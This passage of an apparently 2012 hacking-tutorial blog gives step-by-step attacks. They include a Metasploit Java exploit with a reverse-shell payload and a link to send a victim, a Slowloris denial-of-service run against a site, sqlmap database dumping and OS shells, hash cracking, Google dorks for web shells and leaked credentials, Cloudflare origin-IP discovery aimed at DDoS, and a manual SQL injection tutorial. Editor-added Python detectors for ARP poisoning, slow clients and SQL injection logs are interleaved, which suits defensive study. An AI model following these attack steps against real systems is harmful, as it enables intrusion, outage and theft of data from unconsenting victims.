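        req = urllib.request.Request(urljoin(base_url, p), headers={"User-Agent": "robots-audit/0.1"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[p] = resp.status
        except urllib.error.HTTPError as err:
            results[p] = err.code
        except (urllib.error.URLError, OSError):
            results[p] = None
    return results


if __name__ == "__main__":
    import sys
    groups = parse_robots(SAMPLE_ROBOTS)
    paths = disallowed_for(groups, "Googlebot")
    print("disallowed:", paths, "interesting:", interesting(paths))
    if len(sys.argv) > 1:            # e.g. python robots_audit.py http://www.example.test/
        print(probe(sys.argv[1], paths))
```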

Second method


Directory Traversal

You use directory traversal when a web page denies you access. For example, you go to a disallowed directory and get a denied response (a 403 Forbidden; a 404 means the path does not exist at all, so there is nothing to traverse into).

If the server is insecure you can sometimes bypass that with directory traversal. Also, being denied access to a page is a sign that there must be some juicy info inside. :]

So lets get started.

1. Go to the directory you got denied from. I will be using an example.

www.slave.com/users/

2. Once you get denied you need to add a not found directory.

www.slave.com/users/randomwords&numbers

3. Now for the directory traversal part you need to add a /../

This takes the path back up one directory, which can get you into the disallowed directory if the server applies its access rule to the literal path before normalising the /../. Most servers normalise the path first, so expect this to fail on a correctly configured one.

www.slave.com/users/randomwords&numbers/../

Keep in mind that you can also use the first method once you get access to the directory.

Click here for more path traversal details tutorials.

Third method


CGI-BIN exploits

Alright, there are a lot of public exploits for /cgi-bin/ scripts out right now. So this method only applies if the site has a /cgi-bin/ directory.

Anyway, I don't want my tutorial to get too big, so here is a list of CGI-BIN exploits.

https://www.hellboundhackers.org/articles/7-complete-set-of-cgi-bin-exploits-and-what-they-do.html

Sunday, November 25, 2012

How to POISONING ARP on network?

0 comments
How to do Address Resolution Protocol (ARP) poisoning?

What Does ARP Mean?


Address Resolution Protocol (ARP) is a stateless protocol designed to map Internet Protocol (IP) addresses to their associated Media Access Control (MAC) addresses. By mapping a 32-bit IP address to the 48-bit MAC address of an attached Ethernet device, communication between local nodes becomes possible.

On most operating systems, including Linux, FreeBSD and other Unix-based systems as well as Windows, the "arp" program is present. It can be used to display and/or modify ARP cache entries.

Example output of the "arp" utility looks like the following:

Windows:

> arp -a

Interface: 192.168.1.100 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.1.1           00-13-10-23-9a-53     dynamic

Linux:

$ arp -na

? (192.168.1.1) at 00:90:B1C:F8:C0 [ether] on eth0

FreeBSD:

$ arp -na

? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0

How ARP works?


For Internet Protocol version 4 (IPv4) specifically, ARP maps addresses between the Network layer and the Data Link layer of the Open Systems Interconnection (OSI) model.

For a more complete and thorough explanation of how address resolution works, and protocol specifics, please consult RFC 826.

ARP Protocol Flaws :-

ARP's main flaw is its cache. Because ARP updates existing entries as well as adding new ones, and does so on the strength of any reply it sees, forged replies can rewrite the cache: that is an ARP cache poisoning attack.

Terms & Definitions :-


ARP Cache Poisoning : Sending forged ARP replies on a local network (unicast to a victim, or broadcast as gratuitous ARP), in effect "fooling" nodes on the network. This works because ARP has no authentication, so nodes blindly accept any request or reply they receive.

MAC Address Flooding : An attack on the switch rather than on a host's ARP cache. By flooding a switch with frames from fake MAC addresses, its forwarding (CAM) table fills up. Once it is full, the switch forwards traffic for unknown addresses out of every port, so it behaves like a hub; this is often called "fail-open" or "broadcast mode". The result is that all traffic passing through the switch can be sniffed.

The ARP Attacks :-


1] Connection Hijacking & Interception : Once a client's traffic is routed through the attacker, the connection can be manipulated in any way, up to taking complete control of it.

2] Connection Resetting : The name explains itself. When we reset a client's connection, we cut its connection to the system. This can be done with specially crafted packets; luckily there is software made to help us do so.

3] Man In The Middle : One of the better-known ways of hijacking a user's traffic is a Man In The Middle (MITM) attack. Unlike the other attacks, MITM is a packet-manipulation attack, but it depends on first redirecting the victim's packets to the attacker: all of the victim's traffic is sent to the attacker doing the MITM. The attack is targeted: as opposed to MAC flooding or other attacks against a router or switch, MITM is against a chosen victim. MITM in general is not tied to ARP or to a switched environment (any party on the path, for instance a rogue router on the other side of the country, can do it), but the ARP-poisoning variant discussed here only works against victims on the same local segment, because ARP never crosses a router.

4] Packet Sniffing : Sniffing on a Local Area Network (LAN) is easy when the segment is a hub rather than a switch. On a switched network it is still possible by performing a MAC flood: the switch falls back to hub-like behaviour and the whole network can be sniffed with whatever sniffing software you like.

5] Denial of Service : MAC address flooding can itself be considered a denial-of-service attack. The idea is to generate enough frames towards the switch to overflow its table, at which point it drops into broadcast mode. This does not crash the switch or stop the service, but it is overloaded, and the extra traffic on every port degrades everyone's throughput.
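The flip side of the attacks above is spotting them from the cache. The following Python, an added example that is not part of the post, parses the two "arp -a" formats shown earlier (Windows and Linux/BSD) and reports the classic symptoms of poisoning: one MAC answering for several IPs, and the gateway's MAC differing from a previously recorded one. The sample tables are constructed around a gateway at 192.168.1.1 and an attacker at 192.168.1.50.

```python
import re
from collections import defaultdict

# Constructed samples of `arp -a` output on a LAN whose gateway (192.168.1.1)
# has just been poisoned: it now shows the same MAC as the attacker, 192.168.1.50.
WINDOWS_ARP = """\
Interface: 192.168.1.100 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-aa-bb-cc     dynamic
  192.168.1.50          00-0c-29-aa-bb-cc     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
LINUX_ARP = """\
? (192.168.1.1) at 00:0c:29:aa:bb:cc [ether] on eth0
? (192.168.1.50) at 00:0c:29:aa:bb:cc [ether] on eth0
? (192.168.1.7) at 00:13:10:23:9a:53 [ether] on eth0
"""

# Windows rows: "<ip>  <mac with dashes>  <type>"; Linux/BSD rows: "? (<ip>) at <mac> ..."
WIN_ROW = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+\w+", re.I)
NIX_ROW = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5})", re.I)


def normalise_mac(mac):
    """00-0C-29-AA-BB-CC or 0:c:29:aa:bb:cc -> 00:0c:29:aa:bb:cc"""
    return ":".join(part.zfill(2) for part in re.split(r"[:-]", mac.lower()))


def parse_arp_table(text):
    """Return {ip: mac} from either output format; the broadcast pseudo-entry is dropped."""
    table = {}
    for line in text.splitlines():
        m = WIN_ROW.match(line) or NIX_ROW.search(line)
        if not m:
            continue
        mac = normalise_mac(m.group(2))
        if mac != "ff:ff:ff:ff:ff:ff":
            table[m.group(1)] = mac
    return table


def find_poisoning(table, gateway=None, gateway_mac=None):
    """Two symptoms: one MAC claimed by several IPs, and the gateway's MAC changing.
    Duplicate MACs alone are not proof (a router may legitimately own several IPs),
    so a known-good gateway MAC recorded earlier is the stronger check."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {mac} is claimed by {len(ips)} IPs: {', '.join(sorted(ips))}")
    if gateway and gateway_mac:
        seen = table.get(gateway)
        expected = normalise_mac(gateway_mac)
        if seen is not None and seen != expected:
            findings.append(f"gateway {gateway} moved from {expected} to {seen}")
    return findings


if __name__ == "__main__":
    for label, sample in (("windows", WINDOWS_ARP), ("linux", LINUX_ARP)):
        table = parse_arp_table(sample)
        print(label, table)
        for finding in find_poisoning(table, "192.168.1.1", "00:13:10:23:9a:53"):
            print("  !", finding)
```

To use it on a real machine, pipe the output of "arp -a" into parse_arp_table and pass the gateway MAC you recorded while the network was known to be clean; a static ARP entry for the gateway is the usual hardening step once you have that value.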

Friday, November 23, 2012

How to use latest java vulnerability to hack remote p.c. ?

0 comments
Today we are going to use Metasploit again. We can take over a remote computer with a Java applet that runs code outside the sandbox. The vulnerability was new at the time of writing; it applies to Java 7 up to Update 7.

(1)To use this vulnerability, first update your Metasploit modules by running msfupdate in your terminal.

(2)After the update, type msfconsole

(3)type use exploit/multi/browser/java_jre17_jaxws

(4)set payload java/shell_reverse_tcp

(5)set lhost 223.232.185.97 (your IP, one the victim can reach)

(6)set srvhost 223.232.185.97 (the IP the exploit's web server listens on)

(7)set uripath /

(8)exploit

The URL you should give the victim is http://223.232.185.97:8080/ (SRVPORT defaults to 8080).

Send the link to the victim. When the victim opens it with a vulnerable Java plugin, you get a session on the victim's computer.

(9)type sessions -l

(10)Note the session number, then type sessions -i ID to interact with it.

Wednesday, November 21, 2012

How to crack any hash with help of online services?

0 comments

findmyhash.py tries to crack different types of hashes by looking them up in free online services.

(1)Download it from here.

(2)Open a terminal and change to the directory where you downloaded the tool; if it is in the Downloads folder, type the following in the terminal:

cd Downloads

(3)python findmyhash.py


Accepted algorithms are:

MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPER

NOTE: for LM / NTLM it is recommended to supply both values in this format:

python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

python findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7


Valid OPTIONS are:

-h <hash_value> If you only want to crack one hash, specify its value with this option.

-f <file> If you have several hashes, you can specify a file with one hash per line.

NOTE: All of them have to be the same type.

-g If your hash cannot be cracked, search it in Google and show all the results.

NOTE: This option ONLY works with -h (one hash input) option.


Examples:

-> Try to crack only one hash.

python findmyhash.py MD5 -h 098f6bcd4621d373cade4e832627b4f6

-> If the hash cannot be cracked, it will be searched in Google.

python findmyhash.py SHA1 -h A94A8FE5CCB19BA61C4C0873D391E987982FBBD3 -g

-> Try to crack multiple hashes using a file (one hash per line).

python findmyhash.py MYSQL -f mysqlhashesfile.txt
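Before handing a hash to an online service it helps to know what kind of hash it is, and whether the value is even worth looking up. The following Python is added here as an editor's example; it is not part of findmyhash or of this post. It recognises the hex-digest lengths of the algorithms the tool lists (identification is a candidate list, since MD4, MD5, NTLM and LM all produce 32 hex digits), detects the tool's LM:NTLM pair format, and checks an LM hash for the well-known empty-half constant, which tells you the password was at most seven characters long. It also confirms why the post's sample hashes are found instantly: they are the MD5 and SHA1 of the word "test". The MYSQL check assumes the 4.1+ format (an asterisk followed by 40 hex digits); CISCO7 and JUNIPER formats are not handled.

```python
import hashlib
import re

# Algorithms the tool accepts (from the post), keyed by hex-digest length.
# Several algorithms share a length, so identification is a candidate list,
# never a certainty.
HEX_LENGTHS = {
    32: ["MD4", "MD5", "NTLM", "LM"],
    40: ["SHA1", "RMD160"],
    64: ["SHA256"],
}

# LM hashes the password as two 7-character halves; an empty half always
# hashes to this constant, so seeing it means the password was <= 7 chars.
LM_EMPTY_HALF = "aad3b435b51404ee"


def identify_hash(value):
    """Return candidate algorithm names for a hash string (empty list if unknown)."""
    v = value.strip()
    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", v):
        return ["MYSQL"]                 # MySQL 4.1+ PASSWORD() format (assumption)
    if ":" in v:                         # LM:NTLM pair, the format the tool recommends
        lm, ntlm = v.split(":", 1)
        if len(lm) == 32 and len(ntlm) == 32:
            return ["LM:NTLM"]
    if not re.fullmatch(r"[0-9A-Fa-f]+", v):
        return []
    return HEX_LENGTHS.get(len(v), [])


def lm_password_is_short(lm_hash):
    """True when the second LM half is the empty-half constant (password <= 7 chars)."""
    return lm_hash.lower()[16:] == LM_EMPTY_HALF


def digest(algorithm, text):
    """Hex digest of `text` under a hashlib algorithm name such as 'md5' or 'sha1'."""
    return hashlib.new(algorithm, text.encode()).hexdigest()
```

The audit value of `lm_password_is_short` is on your own dumps: any account whose LM hash ends in the empty-half constant has a short password and should be reset before anyone else reaches the same conclusion.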

Saturday, November 17, 2012

How to crack an MD5 hash in Ubuntu?


If you have a password as an MD5 hash and you need the password in plain text, there are lots of tools and online websites too, but they will not crack every MD5 hash: if your hash exists in their database they will give you the plain-text password, but if not, you have to use a tool like the one shown here.

We are using a Perl script to crack a hash, so we have hashed the text "r2/." into the MD5 hash "5d28a1f53e24a8b0a85d0a53348d49ad"; here we will try to recover the plain text again with Perl.

First of all, here we already know that the length of the text is 4 and that it includes special characters like "." and "/", so our job will be easy. But if we do not know the length or what kinds of characters the text contains, then what? No problem, we have a solution for that too. Let us begin with the first step. If you are using Linux (here we are using BackTrack), first of all you need the Perl script, so download it and follow the steps to crack a hash. I will try to explain each part of this script.

(1)Download the Perl script from here.

(2)Make it executable.

(3)Open a terminal and change to the directory where you downloaded the script.

(4)Now type the following command in the terminal:

perl md5crack.pl

You will see information about the script.

(5)Type the following in the terminal and hit enter:

perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72

ad is the charset: with the ad option it tries only lowercase letters and the digits 0-9. 1 is the minimum length of the candidate text (a, b, c and so on) and 3 is the maximum length, so this command tries every lowercase alphanumeric string of length 1 to 3. If the password is something like abc or ab9, it will show the result. Now let us look at the next command line.
(6)Type the following in the terminal and hit enter:

perl md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72

Here the charset is aA. With this option it tries lowercase and uppercase alphanumeric words like "Jt3", with minimum length 3 and maximum length 3, so it tries aaa, aab, aac, ..., aAc and so on. Now let us move on to the last command line.

(7)Type the following command in the terminal:

perl md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72

Here the charset is aAdx: it tries lowercase, uppercase, digits and special characters such as ./*-+& and so on. The minimum length is 1 and the maximum is 10, so it starts from a and goes up to aaaaaaaaaa. The first command finishes our task fastest, but only if the text contains nothing but lowercase alphanumeric characters; the second also tries uppercase, so it takes longer than the first; and the third takes longer than the first and the second. So how do we finish the job faster? For cracking a hash I suggest using several shells at once. Normally a password is at least 4 characters long, so we can start from 4, and the maximum may be 10 or more, so we can run 6 shells at the same time, one per length, each with the first command's charset. I will give you an example here.

(8)It's our last example.

perl md5crack.pl ad 4 4 900150983cd24fb0d6963f7d28e17f72

perl md5crack.pl ad 4 4 <hash here> tries only 4-character words, so in a second shell we can try 5 5, which tries only 5-character words:

perl md5crack.pl ad 5 5 <hash here>

In the same way we can use 6 6, 7 7, 8 8 and so on. The minimum and maximum length are the same in each shell, so the task finishes faster; how long it takes also depends on which charset you try (ad, aA or aAdx). Now, as I said, here is an example to make it clear: text = "r2/." and its MD5 hash is "5d28a1f53e24a8b0a85d0a53348d49ad". We will try to recover the plain text with the following command:

perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad
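To see why the post recommends splitting the work by length and charset, here is an editor's added Python example, not the md5crack.pl script itself, that computes the candidate count for each charset and length range and runs the same exhaustive search in a few lines. The charset contents are reconstructed from the post's description; the exact special-character set behind the script's x option is an assumption (string.punctuation is used here). The hash 900150983cd24fb0d6963f7d28e17f72 used throughout the post is the MD5 of "abc", which the ad 1 3 search recovers in under 50,000 candidates, while aAdx 1 10 is more than 10^19 candidates. The defensive lesson is the same from either side: an unsalted fast hash of a short password is recovered in seconds, so password storage needs a slow, salted hash and users need length.

```python
import hashlib
import itertools
import string

# Charsets as the post describes the md5crack.pl options (reconstruction; the
# script's actual special-character list for 'x' is an assumption).
CHARSETS = {
    "ad":   string.ascii_lowercase + string.digits,
    "aA":   string.ascii_lowercase + string.ascii_uppercase + string.digits,
    "aAdx": string.ascii_lowercase + string.ascii_uppercase + string.digits
            + string.punctuation,
}


def keyspace(charset_name, min_len, max_len):
    """Total candidates an exhaustive search hashes for this charset/length range."""
    n = len(CHARSETS[charset_name])
    return sum(n ** length for length in range(min_len, max_len + 1))


def split_by_length(charset_name, min_len, max_len):
    """Candidates per fixed length: the per-shell work units the post suggests."""
    n = len(CHARSETS[charset_name])
    return {length: n ** length for length in range(min_len, max_len + 1)}


def crack_md5(target_hex, charset_name, min_len, max_len):
    """Exhaustive search over the charset; returns the plaintext or None."""
    target = target_hex.lower()
    alphabet = CHARSETS[charset_name]
    for length in range(min_len, max_len + 1):
        for candidate in itertools.product(alphabet, repeat=length):
            text = "".join(candidate)
            if hashlib.md5(text.encode()).hexdigest() == target:
                return text
    return None
```

Running `split_by_length("ad", 4, 9)` shows why the post's "one shell per length" split is lopsided: each extra character multiplies the work by 36, so the length-9 shell does 36^5 times the work of the length-4 shell.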

How to install & use SLOWLORIS in ubuntu?

(1)Open a browser and go to this URL: http://ha.ckers.org/slowloris (here you can learn more about what Slowloris is and what it can do).

(2)Scroll down to the bottom of the page, right-click the slowloris link, choose 'Save link as' and save the file to your desktop.

(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.

(4)Then type in your terminal:

sudo apt-get install perl-doc

and enter your password when prompted. This installs the Perl documentation module you'll need to see the Slowloris help page. Wait while the packages download and install.

(5)Then type this command (all on one line) and press enter:

sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl

(6)When asked yes/no, type Y and press enter; this installs some libraries for Slowloris.

Then type another command, this time:

perldoc slowloris.pl

and hit enter. This will show the documentation for Slowloris. I usually type Ctrl+X+Y=enter to save it as a record but if you like you can just scan it and type Ctrl+X to get rid of it.

(7)Next you should type

sudo perl slowloris.pl -dns example.com -port 80 -test

hit enter and give your password if requested. This tests the server to see what its timeout window is. Wait until the test finishes; it will take several minutes. When it is done it will tell you what timeout value to use, something like 'Use 240 seconds for -timeout'.

(8)In the terminal window type

sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5

This performs the actual attack; if your timeout test told you to use another timeout value, use that.

(9)In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.

To stop the attack just type Ctrl+C.
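From the server side, what this attack looks like is one remote address holding many connections open while sending incomplete request headers. The following Python is an editor's added example and not part of the Slowloris post: it counts established connections to the web ports per remote IP from a constructed `ss -tn` style snapshot and flags addresses above a threshold. The threshold of 3 suits the tiny sample only; against the -num 500 used above a real threshold would be far higher. Detection only tells you who is holding the sockets; the fix is a header read timeout on the server, for example Apache's mod_reqtimeout directive `RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500`, which drops clients that send headers too slowly.

```python
from collections import Counter

# Constructed snapshot in the column order of `ss -tn`
# (state, recv-q, send-q, local address:port, peer address:port).
SAMPLE_SS = """\
ESTAB 0 0 10.0.0.5:80 203.0.113.7:51234
ESTAB 0 0 10.0.0.5:80 203.0.113.7:51235
ESTAB 0 0 10.0.0.5:80 203.0.113.7:51236
ESTAB 0 0 10.0.0.5:80 203.0.113.7:51237
ESTAB 0 0 10.0.0.5:80 198.51.100.9:40001
ESTAB 0 0 10.0.0.5:443 198.51.100.9:40002
TIME-WAIT 0 0 10.0.0.5:80 192.0.2.44:60000
ESTAB 0 0 10.0.0.5:22 192.0.2.44:60001
"""

WEB_PORTS = {"80", "443"}


def count_web_connections(ss_output):
    """Established connections per remote IP to the web ports."""
    counts = Counter()
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "ESTAB":
            continue                       # only live connections count
        local, peer = parts[3], parts[4]
        if local.rsplit(":", 1)[1] not in WEB_PORTS:
            continue                       # ignore ssh and other services
        peer_ip = peer.rsplit(":", 1)[0]
        counts[peer_ip] += 1
    return counts


def suspected_slow_clients(ss_output, threshold=3):
    """Remote IPs holding more than `threshold` concurrent web connections."""
    counts = count_web_connections(ss_output)
    return sorted(ip for ip, n in counts.items() if n > threshold)
```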

Some cool Google Dork

Symlink dork.

Code:

inurl:/sym/root/ & intext:"Parent Directory"

c99shell dork.

Code:

inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

c99shell dork(2).

Code:

inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

WordPress MySQL details.

Code:

inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)

Database usernames && passwords.

Code:

inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.com

Phish The Phisher

Code:

filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

phpmyadmin exploit

Code:

allinurl:index.php?db=information_schema

Here is a list of other Google dorks. Download here.

Friday, November 16, 2012

How to find a person through his email address?

If you get an email from an unknown person and want to find a little information about that person before replying, you need a reverse email-address lookup. Or if someone abuses you and you want to trace that person, you should use a reverse email-address lookup.
If the person has a website or has listed the account on any public website, then you can find information by using a search engine. But in most cases the person uses a fake email address for communication.

(1)If the person uses a desktop client (like Outlook, Evolution Mail, etc.) to send email, then you can trace their IP from the email. But if they send from a browser, you only get the location of the email provider. For example, if a person sends email from Gmail through a web browser, you get the location of the Gmail server.

Open the headers of the email message and look for lines that say "Received: from" followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.
Now paste the IP address into this trace route tool and you should get a fairly good idea of the location of the email sender.
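The header walk described in step (1), as an editor's added Python example that is not part of this post: it parses a constructed message carrying three Received: headers, pulls the bracketed IP out of each, and returns the bottom-most one, which is the rule the post gives. The caveat a practitioner wants: only the Received: lines added by servers you trust (your own provider's) are reliable; everything below them was written on the sender's side and can be forged, so treat the bottom-most IP as a lead rather than proof.

```python
import email
import re

# Constructed message, headers as a mail client's "show original" view prints them.
# Received: headers are prepended at each hop, so the last one is the oldest.
SAMPLE_MESSAGE = """\
Received: from mx.example.net (mx.example.net [198.51.100.20])
\tby mail.example.org with ESMTP id abc123; Fri, 16 Nov 2012 10:02:11 +0000
Received: from relay.example.net (relay.example.net [198.51.100.5])
\tby mx.example.net with ESMTP; Fri, 16 Nov 2012 10:02:09 +0000
Received: from user-pc (unknown [203.0.113.77])
\tby relay.example.net with ESMTPA; Fri, 16 Nov 2012 10:02:05 +0000
From: someone@example.net
To: you@example.org
Subject: hello

body text
"""

# First dotted-quad inside square brackets, as the post describes.
IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_ips(raw_message):
    """IPs from every Received: header, newest hop first, oldest hop last."""
    msg = email.message_from_string(raw_message)
    ips = []
    for value in msg.get_all("Received", []):
        match = IP_IN_BRACKETS.search(value)
        if match:
            ips.append(match.group(1))
    return ips


def sender_ip(raw_message):
    """The IP in the last (bottom-most) Received: header, per the post's rule."""
    ips = received_ips(raw_message)
    return ips[-1] if ips else None
```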

Saturday, November 10, 2012

HOW TO DO SQL INJECTION FROM LINUX?

Here is an SQL injection tool for Linux: SQLMAP. SQLMAP is a Python-based tool, so you can run it on any OS that has Python installed, which means it also works on Windows. SQLMAP is far more advanced than HAVIJ.

How To Use SqlMap?


(1)Download SQLMAP here.

(2)Now extract it wherever you want.

(3)Change directory. I mean, if you extracted it into Downloads, open a terminal and type the following:

cd Downloads

cd sqlmapproject-sqlmap-f305dde

(4)Now, to find out whether a URL is vulnerable to SQL injection, type the following command:

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website"

(5)To get the databases of the website, type the following command in the terminal:

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website" --dbs

(6)To get the tables and columns of a database, type the following command:

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website" --tables --columns

(7)To get the data of a particular database and table, type the following command:

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website" --dump -D "database_name" -T "table_name"

Now you can view all the dumped data in the following directory:

/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output

What`s next you can do?


1-Execute arbitrary SQL commands on the server

This is probably the easiest thing to do on a server that is vulnerable to SQL injection. The --sql-query parameter can be used to specify an SQL query to execute. Things of interest would be to create a user in the users table or something similar, or maybe change/modify the content of CMS pages, etc.

Another parameter, --sql-shell, gives an SQL-shell-like interface to run queries interactively.

2-Get inside the admin panel and play

If the website is running some kind of custom CMS or something similar that has an admin panel, then it might be possible to get inside, provided you are able to crack the password retrieved in the database dump. Simple, short passwords can be broken simply by brute force; long, complex passwords may not be breakable.

Check if the admin panel allows you to upload files. If an arbitrary PHP file can be uploaded it is a lot more fun: the PHP file can contain shell_exec, system, exec or passthru function calls, and that allows executing arbitrary system commands. PHP web shell scripts can be uploaded to do the same thing.

3-Shell on remote OS

This is the thing to do to completely take over the server. However, note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter called --os-shell that can be used to try to get a shell on the remote system, but it has many limitations of its own.
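For whoever administers a site like the one targeted above, both sqlmap and the manual probes later on this page leave distinctive traces in the web server's access log. The following Python is an editor's added example, not part of sqlmap or of this post: it scans constructed Apache combined-format lines for the payload shapes this page shows (a quote inside the query string, ORDER BY n, UNION SELECT, information_schema) and for the sqlmap User-Agent, after URL-decoding the request. It serves this post and the manual injection tutorial further down, whose queries it recognises. Since sqlmap lets its user override the User-Agent, the payload patterns matter more than the agent string; the 500 status after the quoted parameter in the sample is the same error-based signal the tutorial relies on, now seen from the server's side.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (addresses from documentation ranges).
SAMPLE_LOG = """\
203.0.113.8 - - [10/Nov/2012:12:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Nov/2012:12:00:02 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 231 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Nov/2012:12:00:03 +0000] "GET /page.php?id=1%20ORDER%20BY%205-- HTTP/1.1" 500 231 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Nov/2012:12:00:04 +0000] "GET /page.php?id=-1%20UNION%20SELECT%201,2,3,4-- HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Nov/2012:12:05:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.10 - - [10/Nov/2012:12:06:00 +0000] "GET /page.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Each signature is matched against the URL-decoded request path and query.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("information-schema", re.compile(r"information_schema", re.I)),
    ("quote-in-query", re.compile(r"\?.*'")),
]


def scan_access_log(text):
    """(ip, decoded url, reasons) for every line that trips a signature."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue                       # not a combined-format line
        url = unquote_plus(match.group("url"))
        reasons = [name for name, rx in SIGNATURES if rx.search(url)]
        if "sqlmap" in match.group("ua").lower():
            reasons.append("sqlmap-user-agent")
        if reasons:
            findings.append((match.group("ip"), url, tuple(reasons)))
    return findings


def hits_per_ip(text):
    """How many flagged requests each source address made."""
    return Counter(ip for ip, _, _ in scan_access_log(text))
```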

Friday, November 9, 2012

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods rely on bad admin configurations, but such configurations are still quite common.

If you want to find the real IP address of a website which is hidden by CLOUDFLARE: it has come to my attention that many booters, hosts, malicious websites and more use CloudFlare for DDoS protection and anti-abuse-report protection. With CloudFlare protection it is difficult to get the host's IP; therefore it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain the real IP of any website protected by CloudFlare, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain, it gives an IP which is not the website's real IP address. Try the following hostnames to get the real IP address of the domain:

ping direct-connect.domain.com

OR

ping direct.domain.com

OR

ping ftp.domain.com

OR

ping cpanel.domain.com

OR

ping mail.domain.com

METHOD 2 :-

For a long-established domain you can use the Netcraft toolbar to check the real IP.

For example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly we can see the change in IP to a CloudFlare one.

METHOD 3 :-

You can try brute-forcing DNS; some subdomain may carry the real IP of the website.

For this purpose you need the Nmap tool.

Open your terminal with root privileges and type the following:

# nmap -sV -sS -F <target>

It scans the host and gives results; it does not give the real IP of the website (but from this you can tell whether the website is protected by CLOUDFLARE or not).

Now type the following in the terminal:

# nmap --script dns-brute -sn <target>

It will give you the real IP of the website.

I made a simple bash script which does all of this for you. For more details click here.

If none of the above methods work, then there is no admin misconfiguration, so you cannot find the real IP.

Wednesday, November 7, 2012

How to do SQL injection manually?

According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

You can also do it using some tools; here we are doing it without tools.

If you want to do it easily with the help of tools, then read my previous tutorial using HAVIJ here.

Let us have a look at the contents of this tutorial..

Part One - Website Assessment

- Finding a vulnerable website

- Determining the amount of columns

- Finding which columns are vulnerable

Part Two - Gathering Information

- Determining the SQL version

- Finding the database

Part Three - The Good Part

- Finding the table names

- Finding the column names

- Displaying the column contents

- Finding the admin page

Let us begin now.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. If you are unfamiliar with the term "dorks": dorks are website URLs that are possibly vulnerable. In SQL injection these dorks look like this:

Code:

inurl:page.php?id=

This will be inputted into Google's search bar and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

